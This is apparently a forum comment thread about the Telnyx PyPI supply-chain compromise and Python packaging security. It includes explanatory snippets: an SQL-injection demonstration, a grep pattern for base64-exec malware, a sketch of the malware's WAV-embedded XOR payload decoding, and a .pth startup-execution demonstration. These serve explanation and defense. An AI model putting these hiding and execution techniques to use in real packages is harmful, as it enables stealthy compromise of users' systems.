It's either that... or promoting reproducible environment with Guix everywhere. Your own Guix container, isolated, importing Pip/CPAN/CTAN/NPM/OPAM and who knows else into a manifest file and ready to ship anywhere, either as a Guix package, a Docker container (Guix can do that), a single DEB/RPM, an AppImage ready to launch on any modern GNU/Linux with a desktop and a lot more.
Forth has no standard library for interfacing with SQLite or any other database. You're either using 8th or the C ABI. Therefore, you'll most likely be concatenating SQL queries. Are you disciplined enough to make that properly secure? Do you know all the intricacies?
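For contrast, here is a toy illustration (in Python's stdlib sqlite3, not Forth) of why concatenated queries are dangerous and what parameterized queries buy you; the table and values are made up:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")

evil = "alice' OR '1'='1"
# Concatenation: the input is spliced into the SQL text, so the
# injected OR clause matches every row.
unsafe = conn.execute(
    "SELECT COUNT(*) FROM users WHERE name = '" + evil + "'"
).fetchone()[0]
# Parameterized: the driver passes the value out-of-band, so the
# whole string is compared literally and nothing matches.
safe = conn.execute(
    "SELECT COUNT(*) FROM users WHERE name = ?", (evil,)
).fetchone()[0]
print(unsafe, safe)  # → 1 0
```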
Unless maybe you give special permission to some trusted company to designate certain releases of packages they don't own are security patches... But that sounds untenable.
"Accepts RFC 3339 timestamps (e.g., 2006-12-02T02:07:43Z), a \"friendly\" duration (e.g., 24 hours, 1 week, 30 days), or an ISO 8601 duration (e.g., PT24H, P7D, P30D)."
So any project that uses uv, and any developer that tries to get uv into a project, is on average less safe than a project that just uses pip and a requirements.txt
Care to explain? Would love to learn.
To me personally this idea still sounds a bit off - but as a heuristic it might have some merit in certain circumstances.
I think uv is great, but I somewhat agree. We see this issue with node/npm. We need smaller supply chains/less dependencies overall, not just bandaiding over the poor decisions with better dependency management tooling.
Pip resolves dependencies just fine. It just also lets you try to build the environment incrementally (which is actually useful, especially for people who aren't "developers" on a "project"), and is slow (for a lot of reasons).
I agree that dependency management should be made easier. To be honest, I really like how Go handles dependencies and how its community works around them: the language has a really great stdlib to work with, and the community mostly prefers to rely on very few dependencies.
Maybe second to that, Zig is interesting: although I see people using libraries, it's on a much lower level compared to Rust/Node/Python.
Sadly, Rust suffers from the same dependency issue as Node/Python.
Wanting a better pip means I am unsafe?
Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.
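A toy version of such a grep-style check, with a made-up `flag_lines` helper (real scanners are more elaborate, but this is the core idea):

```python
import re

# Flag lines that combine exec/eval with base64 decoding -- the
# pattern simple regex-based checkers scream at.
SUSPICIOUS = re.compile(r"(exec|eval)\s*\(\s*base64\.b64decode")

def flag_lines(source: str) -> list[int]:
    """Return 1-based line numbers that match the suspicious pattern."""
    return [i for i, line in enumerate(source.splitlines(), 1)
            if SUSPICIOUS.search(line)]

sample = "import base64\nexec(base64.b64decode(payload))\n"
print(flag_lines(sample))  # → [2]
```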
> The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script.
Talk about burying the lede.
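A minimal sketch of the decoding scheme the quote describes, purely for illustration: the key and payload here are invented, and this is not the actual malware code:

```python
import base64

def decode_payload(b64_data: bytes) -> bytes:
    """Base64-decode, take the first 8 bytes as an XOR key,
    and XOR the remainder to recover the embedded payload."""
    raw = base64.b64decode(b64_data)
    key, body = raw[:8], raw[8:]
    return bytes(b ^ key[i % 8] for i, b in enumerate(body))

# Build a sample blob the same way an attacker would: key + XORed body.
key = b"\x13\x37\x00\xff\x42\x42\x42\x42"
secret = b"print('hello')"
encoded = base64.b64encode(
    key + bytes(b ^ key[i % 8] for i, b in enumerate(secret))
)
print(decode_payload(encoded))  # → b"print('hello')"
```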
More generally speaking one would have to treat the computer/container/VM as compromised. User-level malware still sucks. We've seen just the other day that Python code can run at startup time with .pth files (and probably many other ways). With a source distribution, it can run at install time, too (see e.g. https://zahlman.github.io/posts/python-packaging-3/).
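The .pth mechanism is easy to demonstrate: the site module executes any .pth line beginning with `import` when it processes a site directory. A small sketch (the file name and environment variable are made up):

```python
import os
import site
import tempfile

# Write a .pth file whose line starts with "import"; the site module
# will exec such lines when the directory is processed.
d = tempfile.mkdtemp()
with open(os.path.join(d, "demo.pth"), "w") as f:
    f.write("import os; os.environ['PTH_DEMO_RAN'] = '1'\n")

site.addsitedir(d)  # processes .pth files, executing the import line
print(os.environ.get("PTH_DEMO_RAN"))  # → 1
```

In a real install the .pth lands in site-packages, so the code runs on every interpreter startup, with no visible import in your own source.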
> What to Do If Affected
> Downgrade immediately:
> pip install telnyx==4.87.0
Even if only the "environment" were compromised, that includes pip in the standard workflow. You can use an external copy of pip instead, via the `--python` option (and also avoid duplicating pip in each venv, wasting 10-15MB each time, by passing `--without-pip` at creation). I touch on both of these in https://zahlman.github.io/posts/python-packaging-2/ (specifically, showing how to do it with Pipx's vendored copy of pip). Note that `--python` is a hack that re-launches pip using the target environment; pip won't try to import things from that environment, but you'd still be exposed to .pth file risks.
The packages are quarantined by PyPI
Follow the overall incident: https://ramimac.me/teampcp/#phase-10
Aikido/Charlie with a very quick blog: https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-...
ReversingLabs, JFrog also made parallel reports
The blast radius of TeamPCP just keeps on increasing...
Is there any way to setup PyPI to only publish packages that come from a certain pattern of tag that exists in GH? Would such a measure help at all here?
On Debian, all builds happen without internet access. So whatever ends up in the .deb file is either contained in the dependencies or in the orig tarball.
Is anything similar done for builds that create artifacts for PyPI, so that a certain correspondence between binary file and sources exists? Or is there unrestricted internet access, so that what actually ends up on PyPI can come from anywhere and vetting the sources is of little help?
(If I wanted to taxonomize these things, I say that the Debian model is effectively a pinky promise that the source artifacts correspond to the built product, except that it’s a better pinky promise because it’s one-to-many instead of many-to-many like language package managers generally are. You can then formalize that pinky promise with keys and signatures, but at the end of the day you’re still essentially binding a promise.)
No ... I tried hard. But still get a timeout.
[1]: https://github.com/pypa/advisory-database/blob/main/vulns/te...
[2]: https://osv.dev/vulnerability/MAL-2026-2254
Am I being too nitpicky to say that that is part of your infrastructure?
Doesn't 2FA stop this attack in its tracks? PyPI supports 2FA, no?
Yeah it means you don’t get zero click releases. Maybe boto gets special treatment
I also wrote the twine manpage (in debian) because at the time there was even no way of knowing how to publish at all.
Basically you enable 2FA on your account, go on the website, generate a token, store it in a .txt file and use that for the rest of your life without having to use 2FA ever again.
I had originally thought you'd need your 2FA every upload but that's not how it works.
Then they have the trusted publisher thing (which doesn't and won't work with Codeberg) where they just upload whatever comes from GitHub's runners. Of course, if the developer's token.txt got compromised, there's a chance their private SSH key for pushing to GitHub got compromised too, and the attackers can push something that will end up on PyPI anyway.
Remember that trusted publishing replaces GPG signatures, so the one thing that required unlocking the private key with a passphrase is no longer used.
python.org has also stopped signing their releases with GPG in favour of Sigstore, which is another third-party signing scheme somewhat similar to trusted publishing.
edit: They deny this but my suspicion is that eventually tokens won't be supported and trusted publishing will be the only way to publish on pypi, locking projects out of using codeberg and whatever other non-major forge they might wish to use.
> Then they have the trusted publisher thing (which doesn't and won't work with codeberg) where they just upload whatever comes from github's runners.
There’s no particular reason it wouldn’t work; it’s just OIDC and Codeberg could easily stand up an IdP. If you’re willing to put the effort into making this happen, I’d be happy (as I’ve said before) to review any contributions towards this end.
(The only thing that won’t work here is imputing malicious intent; that makes it seem like you have a score to settle rather than a genuine technical interest in the community.)
It didn't look to me like codeberg was being seriously considered for inclusion.
[1]: https://discuss.python.org/t/new-oidc-providers-for-trusted-...
Support wasn't helpful.
Went with Twilio instead.
But it is ironic that Telnyx now brands itself as an AI company, yet they couldn't detect that I was just calling some family once in a while and not involved in a massive spam campaign.
The only one who kept me around was voip.ms but it literally doesn't work.
I am still looking for a decent VoIP provider to simply make calls.
> We've reviewed the details you provided and updated your case with the necessary information. It is now being routed to the appropriate team for further support.
That was July 2025!
On GitHub, see my fork runvnc/PySIP. Please let me know if you know of something better for Python that is not copyleft and doesn't rely on some copyleft or big external dependency. I was using baresip, but it was a pain to integrate and configure with Python.
Anyway, after fixing a lot in the original PySIP, my version works with Telnyx. Not tested on other SIP providers.
Never really thought too much about the security implications but that is of course a benefit too.
Main reasoning for us has been to aim for a really nice HTTP API rather than hide uglyness with an SDK on top.
Ended up sticking a twilio endpoint in the ring group with a "press 1 to accept this call" message so it wouldn't eat the call, then was able to fire an http request with the call details.
It worked well, although I admit I was a little annoyed I couldn't do it directly with VoIP.ms.
Every time I wanted to call a number in Europe I had to contact their support and go through "can you try now and see if it works?" several times.
After 3 months I had enough of it and asked to have my provisioned credit reimbursed but they just refused.
> An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.
Agreed, that's why a lot of packaging ecosystems (including PyPI) have moved towards schemes that involve self-scoping, self-expiring tokens. The CI can still publish, but the attacker can no longer exfiltrate the publishing credential and use it indefinitely later.
(These schemes are not mandatory, because they can't be.)
[1] https://xkcd.com/353/